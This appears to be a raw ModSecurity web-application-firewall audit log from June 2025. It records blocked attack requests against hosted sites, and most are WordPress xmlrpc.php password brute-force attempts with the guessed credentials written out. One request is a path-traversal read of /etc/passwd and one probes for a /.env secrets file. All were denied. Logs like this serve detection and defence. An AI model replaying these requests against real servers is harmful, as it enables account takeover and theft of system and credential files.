gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68e15166-Z-- --8044911e-A-- [05/Jun/2025:14:21:19 +0700] aEFFb-th7G2xELALzPYj0QAAAMM 103.236.140.4 39312 103.236.140.4 8181 --8044911e-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8044911e-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin1qaz2wsx --8044911e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8044911e-E-- --8044911e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108079134567 5303 (- - -) Stopwatch2: 1749108079134567 5303; combined=3932, p1=449, p2=3318, p3=0, p4=0, p5=97, sr=88, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8044911e-Z-- --d6a53713-A-- [05/Jun/2025:14:22:12 +0700] aEFFpOth7G2xELALzPYj2wAAAM0 103.236.140.4 39326 103.236.140.4 8181 --d6a53713-B-- GET /?umbrella-restore=1&filename=../../../../../../etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 172604142 --d6a53713-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d6a53713-E-- --d6a53713-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /?umbrella-restore=1&filename=../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108132696036 1569 (- - -) Stopwatch2: 1749108132696036 1569; combined=510, p1=352, p2=129, p3=0, p4=0, p5=29, sr=85, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6a53713-Z-- --b4bc051c-A-- [05/Jun/2025:14:23:23 +0700] aEFF63-K7ToMdu-YSIIlkQAAABE 103.236.140.4 39384 103.236.140.4 8181 --b4bc051c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.180 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.180 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b4bc051c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh-soleh --b4bc051c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4bc051c-E-- --b4bc051c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.180 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108203316791 6038 (- - -) Stopwatch2: 1749108203316791 6038; combined=4150, p1=532, p2=3433, p3=0, p4=0, p5=110, sr=92, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4bc051c-Z-- --d74f2468-A-- [05/Jun/2025:14:25:04 +0700] aEFGUCrHpfaS2Cuwh8XVjwAAAEg 103.236.140.4 39470 103.236.140.4 8181 --d74f2468-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 139.59.17.212 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 139.59.17.212 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d74f2468-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin1234! --d74f2468-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d74f2468-E-- --d74f2468-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 139.59.17.212 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108304556183 5719 (- - -) Stopwatch2: 1749108304556183 5719; combined=4048, p1=496, p2=3387, p3=0, p4=0, p5=98, sr=88, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d74f2468-Z-- --a3488b03-A-- [05/Jun/2025:14:25:36 +0700] aEFGcCrHpfaS2Cuwh8XVlQAAAE8 103.236.140.4 39492 103.236.140.4 8181 --a3488b03-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a3488b03-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin[_host_]2021 --a3488b03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3488b03-E-- --a3488b03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108336359519 31580 (- - -) Stopwatch2: 1749108336359519 31580; combined=57683, p1=369, p2=2190, p3=0, p4=0, p5=27572, sr=69, sw=56, l=0, gc=27496 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3488b03-Z-- --e64a5154-A-- [05/Jun/2025:14:26:26 +0700] aEFGon-K7ToMdu-YSIIlrgAAAAQ 103.236.140.4 39520 103.236.140.4 8181 --e64a5154-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e64a5154-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin95 --e64a5154-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e64a5154-E-- --e64a5154-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108386116493 5214 (- - -) Stopwatch2: 1749108386116493 5214; combined=3818, p1=444, p2=3201, p3=0, p4=0, p5=102, sr=88, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e64a5154-Z-- --d7fcc206-A-- [05/Jun/2025:14:27:33 +0700] aEFG5SrHpfaS2Cuwh8XVpAAAAE0 103.236.140.4 39574 103.236.140.4 8181 --d7fcc206-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 139.59.17.212 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 139.59.17.212 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --d7fcc206-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin85 --d7fcc206-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7fcc206-E-- --d7fcc206-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 139.59.17.212 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108453152202 6149 (- - -) Stopwatch2: 1749108453152202 6149; combined=4364, p1=521, p2=3671, p3=0, p4=0, p5=102, sr=92, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7fcc206-Z-- --5f14860d-A-- [05/Jun/2025:14:27:40 +0700] aEFG7FwdJdhOudw5hdzQLAAAAIg 103.236.140.4 39584 103.236.140.4 8181 --5f14860d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5f14860d-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminadmin1979 --5f14860d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f14860d-E-- --5f14860d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108460765969 6016 (- - -) Stopwatch2: 1749108460765969 6016; combined=4327, p1=555, p2=3596, p3=0, p4=0, p5=104, sr=106, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f14860d-Z-- --b9b65639-A-- [05/Jun/2025:14:30:23 +0700] aEFHj1wdJdhOudw5hdzQOwAAAIw 103.236.140.4 39630 103.236.140.4 8181 --b9b65639-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b9b65639-C-- system.multicallmethodNamewp.getUsersBlogsparamsjaninepassword --b9b65639-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9b65639-E-- --b9b65639-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108623497717 4987 (- - -) Stopwatch2: 1749108623497717 4987; combined=3765, p1=391, p2=3184, p3=0, p4=0, p5=113, sr=77, sw=77, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9b65639-Z-- --7557610a-A-- [05/Jun/2025:14:35:00 +0700] aEFIpFwdJdhOudw5hdzQVgAAAIU 103.236.140.4 39776 103.236.140.4 8181 --7557610a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7557610a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmina123456 --7557610a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7557610a-E-- --7557610a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749108900861992 5842 (- - -) Stopwatch2: 1749108900861992 5842; combined=4057, p1=536, p2=3349, p3=0, p4=0, p5=101, sr=104, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7557610a-Z-- --913a9a55-A-- [05/Jun/2025:14:39:05 +0700] aEFJmSrHpfaS2Cuwh8XVxAAAAFg 103.236.140.4 39854 103.236.140.4 8181 --913a9a55-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.18.250.175 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.18.250.175 X-Forwarded-Proto: https Connection: close Content-Length: 486 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --913a9a55-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminADMIN[_host_] --913a9a55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --913a9a55-E-- --913a9a55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 178.18.250.175 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749109145891112 5870 (- - -) Stopwatch2: 1749109145891112 5870; combined=4167, p1=514, p2=3480, p3=0, p4=0, p5=101, sr=91, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --913a9a55-Z-- --e39bde11-A-- [05/Jun/2025:14:42:42 +0700] aEFKcirHpfaS2Cuwh8XV2gAAAEU 103.236.140.4 39932 103.236.140.4 8181 --e39bde11-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.53.96.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.53.96.142 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --e39bde11-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh$ --e39bde11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e39bde11-E-- --e39bde11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 92.53.96.142 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749109362251433 4485 (- - -) Stopwatch2: 1749109362251433 4485; combined=3503, p1=363, p2=2974, p3=0, p4=0, p5=96, sr=73, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e39bde11-Z-- --9219b26d-A-- [05/Jun/2025:14:43:39 +0700] aEFKqyrHpfaS2Cuwh8XV4wAAAFI 103.236.140.4 39958 103.236.140.4 8181 --9219b26d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.29 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; POCO F1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --9219b26d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9219b26d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749109419355854 696 (- - -) Stopwatch2: 1749109419355854 696; combined=293, p1=237, p2=0, p3=0, p4=0, p5=55, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9219b26d-Z-- --830c5b75-A-- [05/Jun/2025:15:08:20 +0700] aEFQdH-K7ToMdu-YSIImBwAAAA8 103.236.140.4 40530 103.236.140.4 8181 --830c5b75-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 216.10.249.85 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 216.10.249.85 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --830c5b75-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehAdmin@12345 --830c5b75-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --830c5b75-E-- --830c5b75-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 216.10.249.85 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749110900809973 5049 (- - -) Stopwatch2: 1749110900809973 5049; combined=3929, p1=511, p2=3252, p3=0, p4=0, p5=98, sr=148, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --830c5b75-Z-- --f7a8a83c-A-- [05/Jun/2025:15:10:58 +0700] aEFREuth7G2xELALzPYkKwAAAMM 103.236.140.4 40630 103.236.140.4 8181 --f7a8a83c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 216.10.249.85 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 216.10.249.85 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f7a8a83c-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehAdmin123! --f7a8a83c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7a8a83c-E-- --f7a8a83c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 216.10.249.85 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749111058671479 4919 (- - -) Stopwatch2: 1749111058671479 4919; combined=3704, p1=419, p2=3118, p3=0, p4=0, p5=98, sr=86, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7a8a83c-Z-- --86ea907a-A-- [05/Jun/2025:15:13:19 +0700] aEFRnyrHpfaS2Cuwh8XWdwAAAEk 103.236.140.4 40696 103.236.140.4 8181 --86ea907a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --86ea907a-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix2 --86ea907a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86ea907a-E-- --86ea907a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749111199613533 4806 (- - -) Stopwatch2: 1749111199613533 4806; combined=3610, p1=377, p2=3059, p3=0, p4=0, p5=103, sr=78, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86ea907a-Z-- --5e6a1c40-A-- 